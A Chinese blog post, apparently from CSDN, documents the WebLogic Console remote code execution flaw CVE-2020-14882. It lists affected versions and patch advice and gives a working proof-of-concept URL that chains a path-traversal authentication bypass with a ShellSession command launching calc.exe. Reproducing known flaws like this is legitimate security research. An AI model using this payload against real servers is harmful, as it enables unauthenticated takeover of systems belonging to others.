Weblogic Console HTTP协议远程代码执行漏洞(CVE-2020-14882)

最新推荐文章于 2024-05-14 10:45:34 发布
最新推荐文章于 2024-05-14 10:45:34 发布
阅读量4.1k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/109380400
版权

1.漏洞描述

未经身份验证的远程攻击者可通过构造特殊的 HTTP GE请求,利用该漏洞在受影响的WebLogic Server上执行任意代码。

2.影响版本

  • Oracle Weblogic Server 10.3.6.0.0
  • Oracle Weblogic Server 12.1.3.0.0
  • Oracle Weblogic Server 12.2.1.3.0
  • Oracle Weblogic Server 12.2.1.4.0
  • Oracle Weblogic Server 14.1.1.0.0

3.漏洞POC

http://127.0.0.1:7001/console/css/%2e%2e%2fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22);

4.漏洞复现

在weblogic登录地址后输入poc,成功弹出计算器

5.漏洞修复

官方修复方案:

此次 Oracle 官方的 CPU已发布了针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。

chaojixiaojingang
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2020-14882-Weblogic Console远程代码执行漏洞
战神/calmness的博客
10-30 964
目录 描述 影响 环境 过程 分析 修复建议 描述 利用该漏洞在受影响的WebLogic Server上执行任意代码,没有进行身份的验证可以远程攻击者通过构造特殊的 HTTP GET请求的方式来进行攻击; 影响 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.3.0 Oracle Weblogic Server 12.2.1..
CVE-2020-14882 Weblogic Console远程代码执行漏洞复现
谢公子的博客
02-06 2040
目录 漏洞背景 漏洞影响版本 漏洞复现 环境搭建 未授权访问 执行payload后回显 漏洞修复 漏洞背景 2020年10月30日,Oracle 官方的发布最新漏洞,该漏洞编号为 CVE-2020-14882 ,漏洞等级:严重 ,漏洞评分:9.8 。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码漏洞影响版本 Oracle WeblogicServ
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 6836
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882,CVE-2020-14883)
最新发布
weixin_45653478的博客
05-14 928
Weblogic Pre-Auth Remote Command Execution 漏洞CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理员控制台组件上执行任意命令。
【vulhub】Weblogic Console HTTP协议远程代码执行漏洞复现(CVE-2020-14882)漏洞复现
qq_45300786的博客
04-10 390
https://www.cnblogs.com/backlion/p/13951858.html
servlet 脚本不执行_Weblogic Console HTTP协议远程代码执行漏洞复现(CVE202014882)
weixin_39745933的博客
12-11 408
0x01 漏洞描述近日,Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogicConsole控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HT...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)
09-14
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它涉及到组件T3协议处理中的对象反序列化过程。该漏洞允许攻击者通过构造恶意的T3请求,远程执行任意代码,从而...
Weblogic漏洞扫描工具
02-22
console 页面探测 & 弱口令扫描、uuid页面的SSRF、CVE-2017-10271 wls-wsat页面的反序列化、CVE-2018-2628 反序列化等功能。
weblogic 未授权命令执行漏洞CVE-2020-14882)复现
热门推荐
锋刃科技的博客
10-29 1万+
简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 漏洞概述 未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。 影响版本 Oracle Weblogic Server 10.3.6.0.0 Orac...
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882,CVE-2020-14883)漏洞复现
weixin_70045024的博客
09-18 1611
Weblogic
cmd执行bat结果不回显_CVE202014882 eblogic Console远程代码执行漏洞复现(豪华版)...
weixin_36349685的博客
01-01 186
网安引领时代,弥天点亮未来0x00漏洞简述2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882 ,漏洞等级:严重 ,漏洞评分:9.8 。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 Web...
weblogic 远程代码执行CVE-2020-14882)
YouthBelief的博客
11-03 726
weblogic 远程代码执行CVE-2020-14882)weblogic 远程代码执行CVE-2020-14882)0x01 漏洞描述0x02 影响范围0x03 漏洞复现工具0x04 漏洞修复 weblogic 远程代码执行CVE-2020-14882) 0x01 漏洞描述 Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。
WebLogic远程代码执行漏洞 CVE-2020-14882
Longwaer
01-13 440
通过笔记详细了解中间件漏洞复现流程。
CVE-2020-14882 weblogic 未授权命令执行复现
weixin_37104668的博客
12-06 461
Weblogic简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Java(J2EE)应用服务器软件(applicati
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值